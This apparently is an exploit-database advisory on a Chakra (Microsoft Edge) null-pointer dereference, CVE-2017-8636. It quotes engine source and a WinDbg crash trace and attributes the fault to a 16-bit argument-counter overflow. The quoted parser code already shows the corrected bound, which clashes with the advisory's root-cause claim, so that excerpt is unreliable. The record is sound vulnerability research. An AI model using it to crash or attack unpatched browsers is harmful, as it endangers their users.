Microsoft Edge Chakra - NULL Pointer Dereference



EKU-ID: 6853 CVE: 2017-8636 OSVDB-ID:
Author: Huang Anwen Published: 2017-08-18 Verified: Verified



<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
 
Besides the stack overflow we mentioned previously, the same issue can also lead to a null-pointer dereference.
 
// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
Js::ArgSlot EmitArgList(
    ParseNode *pnode,
    Js::RegSlot rhsLocation,
    Js::RegSlot thisLocation,
    Js::RegSlot newTargetLocation,
    BOOL fIsEval,
    BOOL fAssignRegs,
    ByteCodeGenerator *byteCodeGenerator,
    FuncInfo *funcInfo,
    Js::ProfileId callSiteId,
    uint16 spreadArgCount = 0,
    Js::AuxArray<uint32> **spreadIndices = nullptr)
{
    // Emits the argument list of a call: ArgListStart, then one ArgOut (or
    // one spread-list entry) per argument via EmitArgs, then ArgListEnd.
    // Returns the argument count reported by EmitArgListEnd.
    //
    // spreadArgCount arrives from the parser as a uint16.  When it has wrapped
    // to 0 (see Parser::ParseArgList) no AuxArray is allocated below even
    // though the list may still hold knopEllipsis nodes, and *spreadIndices is
    // left exactly as the caller passed it; EmitArgs then writes through it.
    EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);

    // Temporary register used for eval's frame display in EmitArgListEnd;
    // released once the list has been emitted.
    Js::RegSlot evalTmp = Js::Constants::NoRegister;
    if (fIsEval)
    {
        evalTmp = funcInfo->AcquireTmpRegister();
    }

    const bool needsSpreadIndices = spreadArgCount > 0;    //spreadArgCount==0 because of overflow****
    if (needsSpreadIndices)
    {
        const size_t extraAlloc = spreadArgCount * sizeof(uint32);
        Assert(spreadIndices != nullptr);
        *spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount);
    }
    // Otherwise *spreadIndices is not initialized here.****

    Js::AuxArray<uint32> *indices = nullptr;
    if (spreadIndices != nullptr)
    {
        indices = *spreadIndices;
    }
    const size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, indices);

    const Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalTmp, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);

    if (fIsEval)
    {
        funcInfo->ReleaseTmpRegister(evalTmp);
    }

    return argumentsCount;
}
 
 
// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
size_t EmitArgs(
    ParseNode *pnode,
    BOOL fAssignRegs,
    ByteCodeGenerator *byteCodeGenerator,
    FuncInfo *funcInfo,
    Js::ProfileId callSiteId,
    Js::AuxArray<uint32> *spreadIndices = nullptr
    )
{
    // Walks the knopList chain of argument nodes and emits one ArgOut per
    // argument, or records a spread argument's position in spreadIndices.
    // Returns the number of ArgOut instructions emitted (spread arguments
    // do not advance argIndex).
    //
    // Precondition: whenever the list contains a knopEllipsis node,
    // spreadIndices must be non-null with room for every such node.  Only an
    // Assert checks this, so in a release build a null spreadIndices combined
    // with a spread argument is a write through a null pointer in emitOne.
    Js::ArgSlot argIndex = 0;
    Js::ArgSlot spreadIndex = 0;

    if (pnode == nullptr)
    {
        return argIndex;
    }

    // Emits a single argument node; shared by the list body and the final
    // element of the chain.
    auto emitOne = [&](ParseNode *arg)
    {
        // If this is a put, the argument has already been evaluated (see
        // EmitReference); only the ArgOut instruction is still needed.
        if (fAssignRegs)
        {
            Emit(arg, byteCodeGenerator, funcInfo, false);
        }

        if (arg->nop == knopEllipsis)
        {
            Assert(spreadIndices != nullptr);
            spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'         //nullptr dereference****
            EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, arg->location, callSiteId, argIndex);
        }
        else
        {
            byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, arg->location, callSiteId);
        }

        if (fAssignRegs)
        {
            funcInfo->ReleaseLoc(arg);
        }
    };

    // Every knopList node holds one argument in pnode1 and the rest of the
    // chain in pnode2.
    for (; pnode->nop == knopList; pnode = pnode->sxBin.pnode2)
    {
        emitOne(pnode->sxBin.pnode1);
    }

    // The tail of the chain is the last argument itself, not a knopList node.
    emitOne(pnode);

    return argIndex;
}
 
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
 
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`56460000 00007ff6`56485000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000   C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffd`49c00000 00007ffd`49e49000   C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`475e0000 00007ffd`4765e000   C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000   C:\Windows\System32\combase.dll
ModLoad: 00007ffd`499b0000 00007ffd`49aa6000   C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffd`4b250000 00007ffd`4b375000   C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000   C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffd`4a100000 00007ffd`4a19d000   C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffd`43c40000 00007ffd`43ca0000   C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffd`4b380000 00007ffd`4b440000   C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`49b60000 00007ffd`49bfa000   C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffd`490a0000 00007ffd`490b1000   C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffd`2c870000 00007ffd`2cc34000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffd`492b0000 00007ffd`499a2000   C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000   C:\Windows\System32\advapi32.dll
ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000   C:\Windows\System32\sechost.dll
ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000   C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000   C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000   C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000   C:\Windows\System32\USER32.dll
ModLoad: 00007ffd`41cb0000 00007ffd`41f36000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffd`490c0000 00007ffd`490de000   C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000   C:\Windows\System32\shcore.dll
ModLoad: 00007ffd`49030000 00007ffd`4907c000   C:\Windows\System32\powrprof.dll
ModLoad: 00007ffd`49010000 00007ffd`49025000   C:\Windows\System32\profapi.dll
ModLoad: 00007ffd`48310000 00007ffd`48341000   C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffd`48f10000 00007ffd`48f39000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffd`486a0000 00007ffd`48744000   C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffd`4b030000 00007ffd`4b09c000   C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000   C:\Windows\System32\NSI.dll
ModLoad: 00007ffd`38c70000 00007ffd`38c96000   C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffd`48a60000 00007ffd`48a77000   C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000   C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffd`48660000 00007ffd`48697000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffd`479c0000 00007ffd`47b30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffd`48ee0000 00007ffd`48f05000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffd`48140000 00007ffd`48161000   C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffd`38a20000 00007ffd`38a94000   C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffd`3e660000 00007ffd`3e682000   C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffd`3d710000 00007ffd`3d72b000   C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000   C:\Windows\System32\ole32.dll
ModLoad: 00007ffd`47830000 00007ffd`478c5000   C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffd`379c0000 00007ffd`37a61000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffd`2df90000 00007ffd`2f641000   C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffd`2d730000 00007ffd`2df1b000   C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffd`45500000 00007ffd`45639000   C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000   C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffd`45c20000 00007ffd`45c96000   C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffd`45b90000 00007ffd`45c1f000   C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffd`45fb0000 00007ffd`46146000   C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffd`39b50000 00007ffd`39c1b000   C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffd`436b0000 00007ffd`437b6000   C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffd`435e0000 00007ffd`43662000   C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffd`46eb0000 00007ffd`46f93000   C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffd`44b90000 00007ffd`44e62000   C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffd`45b70000 00007ffd`45b85000   C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffd`44040000 00007ffd`44571000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000   C:\Windows\System32\shell32.dll
ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000   C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffd`46150000 00007ffd`4617a000   C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffd`39200000 00007ffd`3952e000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000   C:\Windows\System32\msctf.dll
ModLoad: 00007ffd`48f40000 00007ffd`48f70000   C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffd`43860000 00007ffd`43962000   C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffd`36760000 00007ffd`36770000   C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffd`43ba0000 00007ffd`43c09000   C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffd`396b0000 00007ffd`396cb000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffd`400d0000 00007ffd`401a7000   C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffd`488c0000 00007ffd`4891c000   C:\Windows\system32\mswsock.dll
ModLoad: 00007ffd`42450000 00007ffd`4245b000   C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffd`41940000 00007ffd`41b08000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffd`48a80000 00007ffd`48a8b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffd`36f20000 00007ffd`36f3a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000   C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffd`47670000 00007ffd`4768d000   C:\Windows\System32\rmclient.dll
ModLoad: 00007ffd`34410000 00007ffd`34457000   C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffd`46fa0000 00007ffd`470c2000   C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffd`46620000 00007ffd`468ff000   C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffd`47e80000 00007ffd`47f24000   C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000   C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffd`37e60000 00007ffd`37ee2000   C:\Windows\system32\twinapi.dll
ModLoad: 00007ffd`2d700000 00007ffd`2d728000   C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffd`490e0000 00007ffd`492a9000   C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffd`49080000 00007ffd`49091000   C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffd`30870000 00007ffd`308ea000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffd`385b0000 00007ffd`3860d000   C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffd`46900000 00007ffd`46ea4000   C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffd`40390000 00007ffd`4064f000   C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffd`30470000 00007ffd`304ca000   C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffd`448a0000 00007ffd`448e2000   C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffd`44680000 00007ffd`446e7000   C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffd`37780000 00007ffd`377eb000   C:\Windows\System32\oleacc.dll
ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000   C:\Windows\system32\msimtf.dll
ModLoad: 00007ffd`40030000 00007ffd`400b8000   C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffd`39af0000 00007ffd`39b04000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000   C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffd`377f0000 00007ffd`379b5000   C:\Windows\System32\uiautomationcore.dll
ModLoad: 00007ffd`40200000 00007ffd`40388000   C:\Windows\SYSTEM32\windows.globalization.dll
(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> r
rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001
rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0
rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000009
r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000
r14=0000006a8f7fb8f0 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> ub
chakra!EmitArgListEnd+0xdde2c:
00007ffd`2da3130c 0f856022f2ff    jne     chakra!EmitArgListEnd+0x92 (00007ffd`2d953572)
00007ffd`2da31312 0fb7c6          movzx   eax,si
00007ffd`2da31315 e95b22f2ff      jmp     chakra!EmitArgListEnd+0x95 (00007ffd`2d953575)
00007ffd`2da3131a 410fb7c4        movzx   eax,r12w
00007ffd`2da3131e 664403e2        add     r12w,dx
00007ffd`2da31322 0fb7cf          movzx   ecx,di
00007ffd`2da31325 03ca            add     ecx,edx
00007ffd`2da31327 488b942498000000 mov     rdx,qword ptr [rsp+98h]
0:016> u
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504      mov     dword ptr [r13+rax*4+4],ecx
00007ffd`2da31334 488d4c2440      lea     rcx,[rsp+40h]
00007ffd`2da31339 488b4328        mov     rax,qword ptr [rbx+28h]
00007ffd`2da3133d 48894c2420      mov     qword ptr [rsp+20h],rcx
00007ffd`2da31342 488bcd          mov     rcx,rbp
00007ffd`2da31345 448b400c        mov     r8d,dword ptr [rax+0Ch]
00007ffd`2da31349 e8229c2300      call    chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70)
00007ffd`2da3134e 0fb77c2440      movzx   edi,word ptr [rsp+40h]
0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3
00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c
00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c
00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8
00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5
00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80
00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75
00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75
00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164
00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142
00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d
00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380
00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231
00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93
00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93
00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a
00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63
00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3
00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b
00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280
00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
 
 
The root cause of the null-pointer dereference is a 16-bit counter overflow in Parser::ParseArgList:
//ChakraCore-master\lib\Parser\Parse.cpp
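/***************************************************************************
Parse a list of arguments.

Parses the comma-separated argument list that follows an already-scanned
'(' and returns the knopList chain of argument nodes, or nullptr for an
empty list "()".

  pCallOfConstants  set to true, then cleared to false as soon as one
                    argument fails IsConstantInFunctionCall
  pSpreadArgCount   number of knopEllipsis (spread) arguments, as a uint16
  pCount            total number of arguments, as a uint16

Both out-counts are 16 bits wide, so the list is bounded to 0xffff entries
and Error(ERRnoMemory) is raised before a 65536th argument is parsed.  The
bound used to be checked with `count > 0xffffU`, which let count reach
0x10000: static_cast<uint16> then truncated *pCount to 0 and, when every
argument was a spread, *pSpreadArgCount wrapped to 0 as well, so the
byte-code emitter allocated no spread-index array and wrote through nullptr.
***************************************************************************/
template<bool buildAST>
ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount)
{
    ParseNodePtr pnodeArg;
    ParseNodePtr pnodeList = nullptr;
    ParseNodePtr *lastNodeRef = nullptr;

    // Check for an empty list
    Assert(m_token.tk == tkLParen);

    if (m_pscan->Scan() == tkRParen)
    {
        return nullptr;
    }

    // Note: *pSpreadArgCount is written unconditionally here, while the
    // telemetry check below tests pSpreadArgCount for nullptr; callers must
    // always pass a valid pointer.
    *pCallOfConstants = true;
    *pSpreadArgCount = 0;

    int count=0;
    while (true)
    {
        // The count of arguments has to fit in an unsigned short.  This check
        // runs before ++count below, so it must reject count == 0xffff;
        // otherwise the 65536th argument is accepted and the counter wraps
        // to 0 when truncated to uint16.
        if (count >= 0xffffU)
            Error(ERRnoMemory);
        // Allow spread in argument lists.
        IdentToken token;
        pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token);
        ++count;
        this->MarkEscapingRef(pnodeArg, &token);

        if (buildAST)
        {
            this->CheckArguments(pnodeArg);

            if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg))
            {
                *pCallOfConstants = false;
            }

            // Bounded by count, so this uint16 can no longer wrap.
            if (pnodeArg->nop == knopEllipsis)
            {
                (*pSpreadArgCount)++;
            }

            AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg);
        }
        if (m_token.tk != tkComma)
        {
            break;
        }
        m_pscan->Scan();

        // ES7 trailing comma: "f(a, b,)" ends the list here.
        if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled())
        {
            break;
        }
    }

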